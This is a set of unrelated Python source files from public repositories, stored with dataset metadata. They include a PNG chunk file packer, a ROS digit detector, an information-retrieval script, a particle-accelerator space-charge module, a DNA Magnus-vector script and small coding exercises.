Dynamic count functions may\n # return 0 to indicate that the field doesn't exist.\n dead['name'] = os.path.split(extra_file.name)[1].encode()\n dead['data'] = extra_file.read()\n\n chunk = PNGChunk()\n chunk['type'] = b'deAd'\n chunk['data'] = dead\n\n return chunk\n\n\ndef list_chunks(args):\n if args.png_file is None:\n raise RuntimeError('No PNG file to list.')\n\n png, extra_data = read_png(args.png_file)\n\n for chunk in png['chunks']:\n chunk_type = bytes(chunk['type'])\n\n print('Chunk: {} {:8} bytes'\n .format(chunk_type.decode(), chunk['length']))\n\n if chunk_type == b'deAd':\n print(' deAd chunk, file name: {}, file size: {}'\n .format(repr(bytes(chunk['data']['name']).decode()),\n chunk['data']['data_len']))\n elif chunk_type in PNGChunk.data_types:\n print(' data: {}'.format(chunk['data']))\n\n print('{} extra bytes in PNG stream'.format(len(extra_data)))\n\n\ndef pack_files(args):\n if args.png_file is None:\n raise RuntimeError('No PNG file to pack into.')\n\n if args.output is None:\n raise RuntimeError('Output file not specified.')\n\n png, extra_data = read_png(args.png_file)\n\n files_to_pack = flatten_list(args.pack)\n with open(args.output, 'xb') as out_file:\n for f in files_to_pack:\n print('Packing {} ....'.format(repr(f.name)))\n with f:\n new_chunk = pack_file_into_dead_chunk(f)\n png['chunks'].insert(-1, new_chunk)\n\n out_file.write(png.pack())\n out_file.write(extra_data)\n\n print('Done.')\n\n\ndef extract_files(args):\n if args.png_file is None:\n raise RuntimeError('No PNG file to extract from.')\n\n if args.output is None:\n raise RuntimeError('Output directory not specified.')\n\n if not os.path.isdir(args.output):\n raise RuntimeError('\\'--output\\' argument is not a directory.')\n\n png, extra_data = read_png(args.png_file)\n\n files_to_extract = list(flatten_list(args.extract))\n for c in png['chunks']:\n if isinstance(c['data'], DataDEAD):\n file_name = bytes(c['data']['name']).decode()\n if file_name in files_to_extract:\n print('Extracting {} ....'.format(repr(file_name)))\n full_name = os.path.join(args.output, file_name)\n with open(full_name, 'xb') as out_file:\n out_file.write(bytes(c['data']['data']))\n files_to_extract.remove(file_name)\n\n if len(files_to_extract) > 0:\n print('File(s) not found:')\n for f in files_to_extract:\n print(' {}'.format(repr(f)))\n\n print('Done.')\n\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('png_file',\n help='The PNG file to read',\n metavar='PNG',\n nargs='?',\n type=argparse.FileType(mode='rb'))\n\n parser.add_argument('-o', '--output',\n help='The file to write to. 
When extracting files, '\n 'this should be a directory for storing extracted '\n 'files',\n type=str)\n\n cmd_group = parser.add_mutually_exclusive_group()\n\n cmd_group.add_argument('-l', '--list-chunks',\n help='List the chunks in a PNG file',\n action='store_true')\n\n cmd_group.add_argument('-p', '--pack',\n help='Pack file(s) into the PNG file',\n metavar='FILE',\n nargs='+',\n action='append',\n type=argparse.FileType(mode='rb'))\n\n cmd_group.add_argument('-x', '--extract',\n help='Extract files from the PNG file',\n metavar='FILE',\n nargs='+',\n action='append',\n type=str)\n\n return (parser, parser.parse_args())\n\n\nif __name__ == '__main__':\n parser, args = parse_arguments()\n\n if args.list_chunks:\n list_chunks(args)\n elif args.pack:\n pack_files(args)\n elif args.extract:\n extract_files(args)\n else:\n parser.print_help()\n","repo_name":"l04m33/dumpy","sub_path":"demo/png_packer.py","file_name":"png_packer.py","file_ext":"py","file_size_in_byte":12272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"23079806579","text":"#!/usr/bin/env python3\nimport numpy as np\nimport os\nimport math\nimport cv2\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nimport rospy\nfrom duckietown.dtros import DTROS, TopicType, NodeType\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import CompressedImage\nimport rospkg\n\nHOST_NAME = os.environ[\"VEHICLE_NAME\"]\n\n\nclass Digit_Detection(DTROS):\n\n def __init__(self,node_name):\n\n super(Digit_Detection, self).__init__(node_name=node_name, node_type=NodeType.PERCEPTION)\n\n self.sub = rospy.Subscriber(f'/{HOST_NAME}/cropped_digit/compressed', CompressedImage, self.callback)\n self.pub = rospy.Publisher(f'/{HOST_NAME}/april_tag_node/detected_digit', String, queue_size=10)\n\n self.image = None\n self.model = None\n self.rospack = rospkg.RosPack()\n self.path = self.rospack.get_path(\"digit_detection_node\")\n self.trained_model = str(self.path) + \"/src/digit_detection.model\"\n self.prediction = None\n\n\n def callback(self, msg):\n # how to decode compressed image\n # reference: http://wiki.ros.org/rospy_tutorials/Tutorials/WritingImagePublisherSubscriber\n msg.header.seq\n compressed_image = np.frombuffer(msg.data, np.uint8)\n im = cv2.imdecode(compressed_image, cv2.IMREAD_COLOR)\n im = im[:,:,0]\n self.image = im\n self.predict(msg.header.seq)\n\n def load_model(self):\n self.model = tf.keras.models.load_model(self.trained_model)\n\n def predict(self,sequence):\n tf.keras.utils.normalize(self.image,axis=0)\n prediction = self.model.predict(self.image[np.newaxis, :, :], verbose=0)\n print(f\"The detected digit is: {np.argmax(prediction)}\")\n self.pub.publish(String(str(sequence) + \" \" + str(np.argmax(prediction))))\n\nif __name__ == '__main__':\n digit_node = Digit_Detection(\"digit_detection_node\")\n digit_node.load_model()\n rospy.spin()","repo_name":"Tur4L/cmput412_tur4l","sub_path":"Lab5/digit_detection_node/packages/digit_detection_node/src/digit_detection_node.py","file_name":"digit_detection_node.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74666405675","text":"import random\nfrom spade import agent\n\n\nfrom Behaviours.profReview_Behav import ProfReviewBehav\nfrom Behaviours.receiveRequests_Behav import ReceiveRequestBehav\n\n\nclass SellerAgent(agent.Agent):\n\n products_sold = {}\n products_value = {}\n products = ['Apple', 'Banana', 
'Grapefruit', 'Orange', 'Pear', 'Melon', 'Strawberry']\n\n async def setup(self):\n print(\"Agent {}\".format(str(self.jid)) + \"starting...\")\n\n for i in self.products:\n self.products_sold[i] = 0\n self.products_value[i] = random.randint(1, 10)\n\n a = ReceiveRequestBehav()\n b = ProfReviewBehav(period=10)\n\n self.add_behaviour(a)\n self.add_behaviour(b)","repo_name":"FranciscoReisIzquierdo/Agentes-e-Sistemas-Multiagente","sub_path":"Aulas/Aula3/sellerAgent.py","file_name":"sellerAgent.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"41014009522","text":"import math_figures\nimport turtle as t\n\ndef main():\n t.speed(0)\n for angle in range(1, 360, 10):\n t.seth(angle)\n t.color(math_figures.randomColor())\n t.circle(100)\n\n\n t.Screen().exitonclick()\n\n\nif __name__ == '__main__':\n main()","repo_name":"George-Smirnoff/Bootcamp-100","sub_path":"Day_18/spirograph.py","file_name":"spirograph.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"19262828306","text":"import os\nimport numpy as np\nimport pandas as pd\nimport math\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom natsort import natsorted\n\nstop_words = stopwords.words('english')\nstop_words.remove('where')\nstop_words.remove('in')\nstop_words.remove('to')\n\nfiles_name = natsorted(os.listdir('files'))\ndocuments = []\nfor files in files_name:\n with open(f'files/{files}', 'r') as f:\n document = f.read()\n tokenized_documents = word_tokenize(document)\n terms = []\n for word in tokenized_documents:\n if word not in stop_words:\n terms.append(word)\n documents.append(terms)\n print(tokenized_documents)\ndocument_number = 1\npositional_index = {}\n\nfor document in documents:\n\n for positional, term in enumerate(document):\n\n if term in positional_index:\n\n positional_index[term][0] = positional_index[term][0] + 1\n\n if document_number in positional_index[term][1]:\n positional_index[term][1][document_number].append(positional)\n else:\n positional_index[term][1][document_number] = [positional]\n\n else:\n positional_index[term] = []\n positional_index[term].append(1)\n positional_index[term].append({})\n positional_index[term][1][document_number] = [positional]\n\n document_number = document_number + 1\nprint(positional_index)\nquery = 'antony brutus'\n\nfinal_list = [[] for i in range(10)]\n\nfor word in query.split():\n for key in positional_index[word][1].keys():\n\n if final_list[key - 1] != []:\n if final_list[key - 1][-1] == positional_index[word][1][key][0] - 1:\n final_list[key - 1].append(positional_index[word][1][key][0])\n else:\n final_list[key - 1].append(positional_index[word][1][key][0])\n\nfor position, list in enumerate(final_list, start=1):\n\n if len(list) == len(query.split()):\n print(position)\nall_words = []\nfor doc in documents:\n for word in doc:\n all_words.append(word)\n\n\ndef get_freq_term(d):\n words_found = dict.fromkeys(all_words, 0)\n for w in d:\n words_found[w] += 1\n return words_found\n\n\nterm_freq = pd.DataFrame(get_freq_term(documents[0]).values(), index=get_freq_term(documents[0]).keys())\nfor i in range(1, len(documents)):\n term_freq[i] = get_freq_term(documents[i]).values()\n\nprint(term_freq)\n\n\ndef get_wighted_term_freq(x):\n if x > 0:\n return math.log(x) + 1\n return 0\n\n\ntfd = pd.DataFrame(columns=['freq', 'idf'])\nfor i in 
range(len(term_freq)):\n frequency = term_freq.iloc[i].values.sum()\n tfd.loc[i, 'freq'] = frequency\n tfd.loc[i, 'idf'] = math.log(10 / (float(frequency)))\ntfd.index = term_freq.index\nterm_freq_inve_doc_freq = term_freq.multiply(tfd['idf'], axis=0)\n\nprint(term_freq_inve_doc_freq)\n\ndocument_lengths = pd.DataFrame()\n\n\ndef get_doc_length(col):\n return np.sqrt(term_freq_inve_doc_freq[col].apply(lambda x: x ** 2).sum())\n\n\nfor column in term_freq_inve_doc_freq.columns:\n document_lengths.loc[0, f'{column}_len'] = get_doc_length(column)\n\nprint(document_lengths)\n\nnormalize_term_freq_idf = pd.DataFrame()\n\n\ndef get_normalized(col, x):\n try:\n return x / document_lengths[f'{col}_len'].values[0]\n except:\n return 0\n\n\nfor column in term_freq_inve_doc_freq.columns:\n normalize_term_freq_idf[column] = term_freq_inve_doc_freq[column].apply(lambda x: get_normalized(column, x))\n\nprint(normalize_term_freq_idf)\n","repo_name":"MohamedRamadan200224/searching-files-by-python","sub_path":"ir.py","file_name":"ir.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"9200759649","text":"from scipy.constants import e as echarge\n\nfrom ..base_classes import Element\nfrom .gaussian_fields import get_Ex_Ey_Gx_Gy_gauss\nfrom .qgauss import QGauss\nfrom scipy.interpolate import CubicSpline\n\n\nclass SCCoasting(Element):\n \"\"\"Space charge for a coasting beam.\"\"\"\n\n _description = [\n (\"number_of_particles\", \"\", \"Number of particles in the beam\", 0.0),\n (\"circumference\", \"m\", \"Machine circumference\", 1.0),\n (\"sigma_x\", \"m\", \"Horizontal size of the beam (r.m.s.)\", 1.0),\n (\"sigma_y\", \"m\", \"Vertical size of the beam (r.m.s.)\", 1.0),\n (\"length\", \"m\", \"Integration length of space charge kick\", 0.0),\n (\"x_co\", \"m\", \"Horizontal closed orbit offset\", 0.0),\n (\"y_co\", \"m\", \"Vertical closed orbit offset\", 0.0),\n ]\n _extra = [\n (\"min_sigma_diff\", \"m\", \"Threshold to detect round beam\", 1e-8),\n (\"enabled\", \"\", \"Switch to disable space charge effect\", True),\n ]\n\n def track(self, p):\n if self.enabled:\n charge = p.q0 * echarge\n\n Ex, Ey = get_Ex_Ey_Gx_Gy_gauss(\n p.x - self.x_co,\n p.y - self.y_co,\n self.sigma_x,\n self.sigma_y,\n min_sigma_diff=self.min_sigma_diff,\n skip_Gs=True,\n mathlib=p._m,\n )\n\n fact_kick = (\n p.chi\n * self.number_of_particles\n / self.circumference\n * (charge * p.charge_ratio)\n * charge\n * (1 - p.beta0 * p.beta0)\n / (p.p0c * echarge * p.beta0)\n * self.length\n )\n\n p.px += fact_kick * Ex\n p.py += fact_kick * Ey\n\n\nclass SCQGaussProfile(Element):\n \"\"\"Space charge for a bunched beam with generalised\n Gaussian profile.\n \"\"\"\n\n _description = [\n (\"number_of_particles\", \"\", \"Number of particles in the bunch\", 0.0),\n (\"bunchlength_rms\", \"m\", \"Length of the bunch (r.m.s.)\", 1.0),\n (\"sigma_x\", \"m\", \"Horizontal size of the beam (r.m.s.)\", 1.0),\n (\"sigma_y\", \"m\", \"Vertical size of the beam (r.m.s.)\", 1.0),\n (\"length\", \"m\", \"Integration length of space charge kick\", 0.0),\n (\"x_co\", \"m\", \"Horizontal closed orbit offset\", 0.0),\n (\"y_co\", \"m\", \"Vertical closed orbit offset\", 0.0),\n ]\n _extra = [\n (\"min_sigma_diff\", \"m\", \"Threshold to detect round beam\", 1e-8),\n (\"enabled\", \"\", \"Switch to disable space charge effect\", True),\n (\n \"q_parameter\",\n \"\",\n \"q parameter of generalised Gaussian distribution (q=1 for standard 
Gaussian)\",\n 1.0,\n ),\n ]\n\n def track(self, p):\n if self.enabled:\n distr = QGauss(self.q_parameter, mathlib=p._m)\n sigma = p.zeta / p.rvv\n fact_kick = self.number_of_particles * distr.eval(\n sigma, QGauss.sqrt_beta(self.bunchlength_rms)\n )\n\n charge = p.q0 * echarge\n fact_kick *= p.chi * p.charge_ratio * self.length * charge * charge\n fact_kick *= 1 - p.beta0 * p.beta0\n fact_kick /= p.p0c * echarge * p.beta0\n\n Ex, Ey = get_Ex_Ey_Gx_Gy_gauss(\n p.x - self.x_co,\n p.y - self.y_co,\n self.sigma_x,\n self.sigma_y,\n min_sigma_diff=self.min_sigma_diff,\n skip_Gs=True,\n mathlib=p._m,\n )\n\n p.px += fact_kick * Ex\n p.py += fact_kick * Ey\n\n\nclass SCInterpolatedProfile(Element):\n \"\"\"Space charge for a bunched beam with discretised profile.\"\"\"\n\n _description = [\n (\"number_of_particles\", \"\", \"Number of particles in the bunch\", 0.0),\n (\n \"line_density_profile\",\n \"1/m\",\n \"Discretised list of density values with integral normalised to 1\",\n lambda: [1.0, 1.0],\n ),\n (\"dz\", \"m\", \"Unit distance in zeta between profile points\", 1.0),\n (\"z0\", \"m\", \"Start zeta position of line density profile\", -0.5),\n (\"sigma_x\", \"m\", \"Horizontal size of the beam (r.m.s.)\", 1.0),\n (\"sigma_y\", \"m\", \"Vertical size of the beam (r.m.s.)\", 1.0),\n (\"length\", \"m\", \"Integration length of space charge kick\", 0.0),\n (\"x_co\", \"m\", \"Horizontal closed orbit offset\", 0.0),\n (\"y_co\", \"m\", \"Vertical closed orbit offset\", 0.0),\n ]\n _extra = [\n (\n \"method\",\n \"\",\n \"Interpolation method; 0 == linear (default), 1 == cubic spline\",\n 0,\n ),\n (\"min_sigma_diff\", \"m\", \"Threshold to detect round beam\", 1e-8),\n (\"enabled\", \"\", \"Switch to disable space charge effect\", True),\n ]\n\n def track(self, p):\n if self.enabled:\n n_prof_points = len(self.line_density_profile)\n charge = p.q0 * echarge\n\n Ex, Ey = get_Ex_Ey_Gx_Gy_gauss(\n p.x - self.x_co,\n p.y - self.y_co,\n self.sigma_x,\n self.sigma_y,\n min_sigma_diff=self.min_sigma_diff,\n skip_Gs=True,\n mathlib=p._m,\n )\n\n fact_kick = (\n p.chi\n * (charge * p.charge_ratio)\n * charge\n * (1 - p.beta0 * p.beta0)\n / (p.p0c * echarge * p.beta0)\n * self.length\n )\n\n absc_values = p._m.linspace(\n self.z0, self.z0 + self.dz * (n_prof_points - 1), n_prof_points\n )\n\n if self.method == 0:\n ld_factor = p._m.interp(\n p.zeta, absc_values, self.line_density_profile\n )\n elif self.method == 1:\n cs = CubicSpline(absc_values, self.line_density_profile)\n ld_factor = cs(p.zeta)\n else:\n ld_factor = 1\n\n fact_kick *= self.number_of_particles * ld_factor\n p.px += fact_kick * Ex\n p.py += fact_kick * Ey\n","repo_name":"xsuite/xtrack","sub_path":"ducktrack/be_beamfields/spacecharge.py","file_name":"spacecharge.py","file_ext":"py","file_size_in_byte":6078,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"73"} +{"seq_id":"71067095275","text":"import random\n\n\ndef deal_card():\n \"\"\"Returns a random card from the deck\"\"\"\n cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10]\n card = random.choice(cards)\n return card\n\n\ndef calculate_score(cards):\n \"\"\"Take a list of cards and return score calculated\"\"\"\n if sum(cards) == 21 and len(cards) == 2:\n return 0\n if 11 in cards and sum(cards) > 21:\n cards.remove(11)\n cards.append(1)\n return sum(cards)\n\n\nuser_cards = []\ndealer_cards = []\nis_game_over = False\n\nfor _ in range(2):\n user_cards.append(deal_card())\n dealer_cards.append(deal_card())\n\nuser_score = 
calculate_score(user_cards)\ndealer_score = calculate_score(dealer_cards)\n\nprint(f\"Your cards: {user_cards}, current score: {user_score}\")\nprint(f\"Dealers cards: {dealer_cards[0]}\")\n\nif user_score == 0 or dealer_cards == 0 or user_score > 21:\n is_game_over = True\n\nwhile dealer_score != 0 and dealer_score < 17:\n dealer_cards.append(deal_card())\n dealer_score = calculate_score(dealer_cards)\n\n# import random\n\n# cards = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10]\n\n# player_cards = []\n# dealer_cards = []\n\n# def deal_cards():\n# for i in range(2):\n# player_cards.append(random.choice(cards))\n# dealer_cards.append(random.choice(cards))\n# player_count = sum(player_cards)\n# dealer_count = sum(dealer_cards)\n# print(\"Players cards: \",\n# str(player_cards) + \" which equals \" + str(player_count))\n# print(\"Dealers cards: \",\n# str(dealer_cards) + \" which equals \" + str(dealer_count))\n# player_count = sum(player_cards)\n# dealer_count = sum(dealer_cards)\n# while dealer_count < 17:\n# dealer_cards.append(random.choice(cards))\n# dealer_count = sum(dealer_cards)\n# print(\"Dealers hits: \",\n# str(dealer_cards) + \" which equals \" + str(dealer_count))\n# while player_count < 17:\n# player_cards.append(random.choice(cards))\n# player_count = sum(player_cards)\n# print(\"Dealers hits: \",\n# str(player_cards) + \" which equals \" + str(player_count))\n\n# deal_cards()\n","repo_name":"Jonjo-Jefferson/100-days-of-python","sub_path":"days/13_simple_blackjack.py","file_name":"13_simple_blackjack.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"20147924467","text":"# -*- coding: utf-8 -*-\n\"\"\"\n1334. Find the City With the Smallest Number of Neighbors at a Threshold Distance\n\"\"\"\n\nclass Solution(object):\n def findTheCity(self, n, edges, distanceThreshold):\n \"\"\"\n :type n: int\n :type edges: List[List[int]]\n :type distanceThreshold: int\n :rtype: int\n \"\"\"\n inf = int(1e6)+1\n M = [[ inf for i in range(n)] for j in range(n)]\n for f, t, w in edges:\n M[f][t] = w\n M[t][f] = w\n for i in range(n):\n M[i][i] = 0\n for mid in range(n):\n for f in range(n):\n for t in range(n):\n M[f][t] = min(M[f][t], M[f][mid]+M[mid][t])\n M[t][f] = M[f][t]\n minimum = inf\n ind = -1\n for new_ind, endCity in enumerate(M):\n new_minimum = len([1 for i in endCity if i <= distanceThreshold])\n if new_minimum <= minimum:\n minimum = new_minimum\n ind = new_ind\n return ind\nn = 6\nedges =[[2,3,7],[2,5,8],[0,2,8],[4,5,5],[1,5,10],[3,4,3],[0,5,9],[1,2,1]]\ndistanceThreshold = 3269\noutput = Solution().findTheCity(n, edges, distanceThreshold)","repo_name":"yoyau/LeetCodePractice","sub_path":"python/G_lc_1334_floyedWarshall.py","file_name":"G_lc_1334_floyedWarshall.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"37609949174","text":"import os\nimport sys\nimport ConfigParser\n\nfrom pybrightcove import __version__\n\n\nUSER_CONFIG_PATH = os.path.expanduser('~/.pybrightcove')\nCONFIG_PATH = '/etc/pybrightcove.cfg'\nCONFIG_LOCATIONS = [CONFIG_PATH, USER_CONFIG_PATH]\nUSER_AGENT = 'PyBrightcove/%s (%s)' % (__version__, sys.platform)\n\n\ndef has_option(section, name):\n \"\"\"\n Wrapper around ConfigParser's ``has_option`` method.\n \"\"\"\n cfg = ConfigParser.SafeConfigParser({\"working_dir\": \"/tmp\", \"debug\": \"0\"})\n cfg.read(CONFIG_LOCATIONS)\n return 
cfg.has_option(section, name)\n\n\ndef get(section, name):\n \"\"\"\n Wrapper around ConfigParser's ``get`` method.\n \"\"\"\n cfg = ConfigParser.SafeConfigParser({\"working_dir\": \"/tmp\", \"debug\": \"0\"})\n cfg.read(CONFIG_LOCATIONS)\n val = cfg.get(section, name)\n return val.strip(\"'\").strip('\"')\n\n","repo_name":"studionow/pybrightcove","sub_path":"pybrightcove/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"73"} +{"seq_id":"1747060166","text":"#!/usr/bin/env python3\n\"\"\"/***************************************************************************\n *\n * Authors: Ruben Sanchez Garcia rsanchez@cnb.csic.es\n *\n * CSIC\n *\n * This program is free software; you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA\n * 02111-1307 USA\n *\n * All comments concerning this program package may be sent to the\n * e-mail address 'xmipp@cnb.csic.es'\n ***************************************************************************/\n\"\"\"\n\nimport os\nimport sys\n\nfrom xmipp_base import XmippScript\nimport xmippLib\n\n\nclass ScriptMicrographCleanerEm(XmippScript):\n _conda_env = 'xmipp_deepEMhancer'\n\n def __init__(self):\n\n XmippScript.__init__(self)\n\n def getDoubleParamWithDefault(self, paramName, conditionFun= lambda x: False, defaultVal=None):\n if self.checkParam(paramName):\n x = self.getDoubleParam(paramName)\n if conditionFun(x):\n return defaultVal\n return x\n else:\n return defaultVal\n\n def defineParams(self):\n self.addUsageLine('DeepEMhancer. Apply a CCN to post-process an EM volume to obtain a masked and sharpened-like volume in an automatic fashion\\n.'\n 'Normalization of the input volume is key, so unmasked volumes should be provided as input. There are 3 normalization options: \\n'\n '1) Automatic (default)\\n'\n '2) Providing the statistics of the noise'\n '3) Using a binary mask')\n ## params\n self.addParamsLine(' -i : input volume to postprocess (or half map 1). Only mrc format allowed ')\n self.addParamsLine(' [-i2 ] : input half map 2. Only mrc format allowed ')\n\n self.addParamsLine(' -o : output fname to save postprocessed volume. Only mrc format allowed ')\n\n self.addParamsLine(' [ --sampling_rate ] : (optional) The sampling rate of the volume. If not provided, it will be read from -i header')\n\n self.addParamsLine(' [ --checkpoint ] : (optional) deep learning model filename. If not provided, default model will be used')\n\n self.addParamsLine(' [ --cleaningStrengh ] : (optional) Max size of connected componemts to remove 0 ]: Failure threshold. Fraction of the micrograph predicted as contamination to ignore predictions. '+\n '. Ranges 0..1. Default 0.8')\n\n self.addParamsLine('[ -g ] : GPU id to employ. Default 0. 
use -1 for CPU-only computation or \"all\" to use all devices found in '\n 'CUDA_VISIBLE_DEVICES (option for slurm)')\n self.addParamsLine('[ -b ] : Number of cubes to process simultaneously. Lower it if CUDA Out Of Memory error happens and increase it if low GPU performance observed')\n\n self.addParamsLine(' [--binaryMask ] : Normalization-> Binary mask volume to compute stats for normalization. Only mrc format allowed ')\n self.addParamsLine(' [--noise_stats_mean ] : Normalization-> Noise stats mean for normalization ')\n self.addParamsLine(' [--noise_stats_std ] : Normalization-> Noise stats standard deviation for normalization ')\n\n\n ## examples\n self.addExampleLine('xmipp_deep_volume_postprocessing -i path/to/inputVol.mrc -o path/to/outputVol.mrc ')\n \n def run(self):\n\n\n params= \" -i %s \" % self.getParam('-i')\n if self.checkParam('-i2'):\n params += \" -i2 %s \" % self.getParam('-i2')\n\n params += \" -o %s \" % self.getParam('-o')\n\n if self.checkParam('--checkpoint'):\n params += \" --deepLearningModelPath %s \"%os.path.expanduser(self.getParam(\"--checkpoint\"))\n else:\n params += \" --deepLearningModelPath %s \"%XmippScript.getModel(\"deepEMhancer\", \"production_checkpoints/deepEMhancer_tightTarget.hd5\")\n\n if self.checkParam('--sampling_rate'):\n params += \" --samplingRate %f \" % self.getDoubleParam('--sampling_rate')\n\n if self.checkParam('--binaryMask'):\n params += \" --binaryMask %s \" % (os.path.abspath(self.getParam('--binaryMask')))\n\n elif self.checkParam('--noise_stats_mean'):\n params += \" --noiseStats %f %f \" % (self.getDoubleParam('--noise_stats_mean'), self.getDoubleParam('--noise_stats_std'))\n\n if self.checkParam('--cleaningStrengh'):\n params += \" --cleaningStrengh %f \" % self.getDoubleParamWithDefault('--cleaningStrengh', defaultVal=-1)\n\n params+= \"-g %s \"%self.getParam(\"-g\")\n params+= \"-b %s \"%self.getParam(\"-b\")\n\n cmd= \"deepemhancer\"\n print( cmd+\" \"+params)\n self.runCondaCmd(cmd, params)\n\n\nif __name__ == '__main__':\n '''\nscipion xmipp_deep_volume_postprocessing -g 0\n '''\n exitCode=ScriptMicrographCleanerEm().tryRun()\n sys.exit(exitCode)\n \n","repo_name":"I2PC/xmipp","sub_path":"src/xmipp/applications/scripts/deep_volume_postprocessing/deep_volume_postprocessing.py","file_name":"deep_volume_postprocessing.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"73"} +{"seq_id":"42004096375","text":"import numpy as np\nfrom numpy import empty\nnp.set_printoptions(threshold=np.inf)\n\n\n\n\ndef mainmagnus(stri):\n # Initial DNA Sequence (can be upper or lower case)\n inputfilename='testb'+stri+'.txt'\n file = open(inputfilename, \"r\")\n dna = file.read()\n\n #Output file\n outputfilename='bacoutput'+stri+'.txt'\n output = open(outputfilename, \"w\")\n\n #testing\n #dna='accccgc'\n\n #remove numbers and spaces, and linebreaks\n dna = dna.replace(\" \",\"\")\n dna = dna.replace('\\n', '').replace('\\r', '')\n\n dna = ''.join([i for i in dna if not i.isdigit()])\n dna = dna.upper()\n\n output.write('DNA Sequence:\\n')\n output.write(dna+'\\n')\n\n #Length of dna\n dnalength = len(dna)\n\n output.write('DNA Length:\\n')\n output.write(str(dnalength)+'\\n')\n\n #Length of each window (i.e. 
k for k-mer)\n N=5\n output.write('Window Length:\\n')\n output.write(str(N)+'\\n')\n\n #Length of Magnus Vector\n mvl = (4**(N+1)-4)/3\n\n output.write('Length of Magnus Vector (for each window):\\n')\n output.write(str(mvl)+'\\n')\n\n #Number of Windows\n numwin=dnalength//N\n output.write('Number of Windows:\\n')\n output.write(str(numwin)+'\\n')\n\n #Initialize Array of Windows\n winarray = empty([numwin,mvl])\n #print(winarray)\n\n\n\n #print(dnabase4)\n\n # bottom-up, dynamic programming solution using a single array\n #Reference: https://stackoverflow.com/questions/6877249/find-the-number-of-occurrences-of-a-subsequence-in-a-string\n\n def num_subsequences(seq, sub):\n m, n = len(seq), len(sub)\n table = [0] * n\n for i in xrange(m):\n previous = 1\n for j in xrange(n):\n current = table[j]\n if seq[i] == sub[j]:\n table[j] += previous\n previous = current\n return table[n-1] if n else 1\n\n #Change base\n #Reference: https://stackoverflow.com/questions/2267362/how-to-convert-an-integer-in-any-base-to-a-string\n def numberToBase(n, b):\n if n == 0:\n return '0'\n digits = ''\n while n:\n digits+=str(int(n % b))\n n //= b\n return digits[::-1]\n\n for globalcounter in range(0,numwin):\n startindex=globalcounter*N\n endindex=startindex+N\n #Base 4 DNA\n dnabase4 = ''\n\n #Magnus Vector\n magnusvec = [0] * mvl\n\n for i in range(startindex,endindex):\n if (dna[i]=='A'):\n dnabase4+='0'\n elif (dna[i]=='C'):\n dnabase4+='1'\n elif(dna[i]=='G'):\n dnabase4+='2'\n elif(dna[i]=='T' or dna[i]=='U'):\n dnabase4+='3'\n else:\n print('DNA Sequence contains unallowed letters.')\n break\n\n counter = 0\n maxds = 4**N\n while counter=0:\n #print(s)\n ps = (4**len(s)-4)/3 +ds + 1\n #print(ps)\n alphas = num_subsequences(dnabase4,s)\n magnusvec[ps-1]=alphas\n s = '0'+s\n counter+=1\n\n\n\n winarray[globalcounter]=magnusvec\n #end loop\n\n #print(\"Magnus Vectors for R=Z:\")\n #print(winarray)\n\n\n summagnus=[0]*mvl\n for i in range(0,len(winarray)):\n summagnus=summagnus+winarray[i]\n meanmagnus=summagnus/numwin\n output.write('Mean Magnus Vector\\n')\n output.write(str(meanmagnus)+'\\n')\n\n output.close()\n\n npyname='mean'+stri\n np.save(npyname,meanmagnus)\n\n\n\n\n\n\nfor j in range(1,2):\n mainmagnus(str(j))\n\n\n######\n#Short Magnus Window\n'''\nshortmagnusvec=[mvl]\nfor i in range(0,len(magnusvec)):\n if magnusvec[i]!=0:\n shortmagnusvec.append(i+1)\n\nprint('Short Magnus Vector for R=Z:')\nprint(shortmagnusvec)\n'''\n\n#Mod 2 Magnus\n'''\ndef reduceMod2(l):\n return [i % 2 for i in l]\n\n\nmagnusvecmod2=reduceMod2(magnusvec)\nprint(\"Magnus Vector for R=Z/2:\")\nprint(magnusvecmod2)\n\nshortmagnusvecmod2=[mvl]\nfor i in range(0,len(magnusvecmod2)):\n if magnusvecmod2[i]!=0:\n shortmagnusvecmod2.append(i+1)\n\nprint('Short Magnus Vector for R=Z/2:')\nprint(shortmagnusvecmod2)\n'''","repo_name":"wuchengyuan88/Magnus-Representation","sub_path":"magnusvector.py","file_name":"magnusvector.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"4175543594","text":"#!bin/bash/python3\n#Playful Cipher\n\ndef playful_enc():\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n plaintext = 